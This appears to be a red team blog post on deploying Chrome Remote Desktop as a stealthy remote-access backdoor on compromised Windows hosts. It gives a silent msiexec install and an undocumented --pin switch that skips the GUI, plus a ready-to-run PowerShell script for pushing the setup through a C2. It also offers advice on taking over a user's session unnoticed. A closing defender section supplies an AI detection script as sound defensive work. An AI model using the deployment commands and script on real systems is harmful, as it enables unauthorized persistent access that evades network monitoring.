Abusing Chrome Remote Desktop on Red Team Operations: A Practical Guide

In this post, we’ll be exploring a practical technique for abusing Chrome Remote Desktop (also known as Google Remote Desktop) within a Red Team operation. I sometimes find myself needing to use legitimate software to achieve my goals, due to client restrictions or other preventive measures. This post is meant to show how to actually get Chrome Remote Desktop working on an operation, with the one non-obvious trick (scripting the PIN) that makes it deployable without touching the target's GUI.

Primer – Chrome Remote Desktop
Chrome Remote Desktop is a host agent that you download from https://remotedesktop.google.com/, then install and configure on the target. Once configured, the compromised host registers with Google's cloud service and shows up in the web portal under the Google account you enrolled it with; you click on it in the portal to connect. Neat? I think so. Behind the scenes it uses a proprietary protocol developed by Google, referred to internally as Chromoting. Based on the information I have found, it communicates over HTTPS and uses WebRTC for transferring data, so from the network's point of view it looks like ordinary traffic to Google.
What are the requirements for getting started with Chrome Remote Desktop? The only thing you need is a Google account, which anyone can create for free. After creating the account, head over to https://remotedesktop.google.com/ to download the software and start using it. The other requirement is that the installer needs local administrator access on the client.
Walkthrough – Deploying It
Here is a step-by-step guide on how to deploy Chrome Remote Desktop with some tips along the way.
1. Access the setup page
The first step is to navigate to the Chrome Remote Desktop setup page and, under the Set up via SSH menu option, click Begin and then click on the MSI file for Windows to download it.

2. Download MSI File

3. Run the installer
Next, you need to install the MSI file on the target. How you do that depends on what C2 or other access you might have. For simplicity, I will assume you can run a direct command and provide the typical msiexec installer command; /qn runs it silently with no UI. (Remember that you do require local administrator privileges.)
msiexec /i chromeremotedesktophost.msi /qn
4. Start the Chrome Remote Desktop client
Once you have installed it, you can go back to the Chrome Remote Desktop page and click next. The wizard will then ask you to authorize; click the Authorize button to continue.

5. Copy out the onboarding command
On the screen, you should see two (2) Windows commands and one (1) for Debian. Copy out the Windows (Cmd) command and paste it into Notepad. We are going to add something to the command before we send it to the client.

6. Adjust the command
The command you copied out should look something like this:
"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME%
If you run this command as-is, the host installs but the setup stops at an additional step that has to be completed in the GUI: choosing a PIN code. Since you have no GUI on the target, onboarding never finishes. Example of what would happen:

7. Undocumented parameter
To overcome this, we can use an undocumented parameter (I have not found documentation on it). The undocumented parameter is --pin=111111, which supplies the PIN on the command line so the GUI prompt never appears. Note that you need at least six (6) digits in the PIN. A complete command would look like:
"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111
This is how it should look when running it:

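Steps 3 through 7 above, put together as one script that can be pushed through a C2 or run from an elevated PowerShell session on the target. This is an added example and not code from the original post: the MSI is assumed to already be on the target (the $MsiPath default is an assumption), $OneTimeCode is the --code value you copied out of the wizard's Windows (Cmd) command, and the final service check assumes the host runs as a Windows service named chromoting, which is what a default install creates but is not stated on the setup page.

```powershell
# Added example (not from the original post). Run elevated on the target.
# $OneTimeCode: the "--code" value from the wizard's Windows (Cmd) onboarding command.
# $MsiPath default and the 'chromoting' service name are assumptions; adjust as needed.
param(
    [Parameter(Mandatory)] [string] $OneTimeCode,
    [string] $MsiPath  = "$env:TEMP\chromeremotedesktophost.msi",
    [string] $Pin      = '111111',          # must be at least six digits
    [string] $HostName = $env:COMPUTERNAME  # name shown in the web portal
)

# Fail early on the two things that silently break onboarding
if ($Pin -notmatch '^\d{6,}$') { throw 'PIN must be at least six digits' }
if (-not (Test-Path $MsiPath)) { throw "MSI not found at $MsiPath" }

$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()
           ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) { throw 'The installer needs local administrator privileges' }

# Step 3: silent install (/qn = no UI). Wait so we can check the exit code.
$msi = Start-Process -FilePath msiexec.exe -ArgumentList "/i `"$MsiPath`" /qn" -Wait -PassThru
if ($msi.ExitCode -ne 0) { throw "msiexec failed with exit code $($msi.ExitCode)" }

# Steps 5-7: the onboarding command from the wizard, plus --pin so no GUI prompt appears
$startHost = Join-Path ${env:ProgramFiles(x86)} 'Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe'
if (-not (Test-Path $startHost)) { throw "remoting_start_host.exe not found at $startHost" }

& $startHost --code="$OneTimeCode" `
             --redirect-url="https://remotedesktop.google.com/_/oauthredirect" `
             --name="$HostName" `
             --pin="$Pin"
if ($LASTEXITCODE -ne 0) { throw "remoting_start_host.exe exited with code $LASTEXITCODE" }

# Confirm the host service came up (service name is an assumption)
$svc = Get-Service -Name chromoting -ErrorAction SilentlyContinue
if ($svc) { "Host service '$($svc.Name)' is $($svc.Status); '$HostName' should now appear in the portal" }
else      { Write-Warning 'Onboarding returned 0 but no chromoting service was found; check the portal' }
```

The one-time code from the wizard expires, so generate it right before you push the script rather than baking it into a payload hours in advance. Everything the script writes to disk is what a legitimate install writes; the only operator-specific artifact is the --pin= switch on the remoting_start_host.exe command line, which is worth remembering when you read the defender section below.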
8. Connect to client
You should now see the client show up in the Chrome Remote Desktop Portal. Click on it, supply the PIN when prompted, and start to use remote desktop—almost like magic.

9. Remoting to the client

Connecting gives you the target's console, so you will have to unlock or log in to it and you will be taking over the user's session. That means you need to know the user's password or log in as another account you control. Ideally, check that the user has gone home for the day before taking over the desktop, since a locked screen suddenly unlocking, or a mouse moving on its own, is the fastest way to get caught.
Conclusion
Chrome Remote Desktop does require some work to get it going, but it can be an incredibly useful tool on Red Team operations in certain scenarios. It has a pretty smooth experience with little lag when remoting over it, and because it rides on HTTPS and WebRTC to Google's own infrastructure it blends in well with normal traffic.
For defenders, as always, I recommend AppLocker or other allow-list solutions to prevent unauthorized installation of software. If you want to check whether the software is already installed in your environment, it shows up in Programs and Features as Chrome Remote Desktop Host.
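A quick hunt script for the defender side, added here as an example and not part of the original post. It checks the three places a deployment like the one above leaves traces: the installed-product entry (the Chrome Remote Desktop Host name mentioned above), the running host service and process, and process-creation logs showing remoting_start_host.exe being run with a scripted --pin= or msiexec installing the MSI. The service name chromoting, the process name remoting_host.exe, and the use of Security event 4688 (which only carries the command line if command-line auditing is enabled) are assumptions about a default install and a default audit policy.

```powershell
# Added example (not from the original post): hunt for Chrome Remote Desktop Host on one machine.
# Assumptions: service name 'chromoting', process name 'remoting_host', and Security 4688
# events that include "Process Command Line" (requires command-line auditing to be on).
param([int] $LookbackDays = 30)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Installed product: appears in Programs and Features as "Chrome Remote Desktop Host"
$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
)
Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
    Where-Object { $_.DisplayName -like 'Chrome Remote Desktop*' } |
    ForEach-Object { $findings.Add("Installed product: $($_.DisplayName) $($_.DisplayVersion)") }

# 2. Host service and process (names are assumptions based on a default install)
Get-Service -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -eq 'chromoting' -or $_.DisplayName -like 'Chrome Remote Desktop*' } |
    ForEach-Object { $findings.Add("Service: $($_.Name) [$($_.DisplayName)] is $($_.Status)") }
Get-Process -Name remoting_host -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("Process: $($_.Name) PID $($_.Id) from $($_.Path)") }

# 3. Process-creation evidence of the onboarding itself. An operator scripting the PIN
#    leaves "remoting_start_host.exe ... --pin=" on the command line; the MSI install
#    leaves "msiexec ... chromeremotedesktophost.msi".
$since  = (Get-Date).AddDays(-$LookbackDays)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } `
                       -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $cmdLine = ($e.Message -split "`r?`n" | Where-Object { $_ -match 'Process Command Line' }) -join ' '
    if ($e.Message -match 'remoting_start_host\.exe' -or $e.Message -match 'chromeremotedesktophost\.msi') {
        $tag = if ($cmdLine -match '--pin=') { 'SCRIPTED-PIN ONBOARDING' } else { 'CRD activity' }
        $findings.Add("$($e.TimeCreated) ${tag}: $cmdLine")
    }
}

if ($findings.Count -eq 0) { 'No Chrome Remote Desktop artifacts found' } else { $findings }
```

Section 3 is the one that distinguishes an operator from an IT-sanctioned install: a human onboarding through the wizard types the PIN in the GUI, so a remoting_start_host.exe command line carrying --pin= is a strong signal. Sysmon Event ID 1 carries the same command line if you prefer that source, and at fleet scale the same three checks translate directly into an EDR or SIEM query. Allow-listing remains the better control, since it stops the MSI from running at all.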
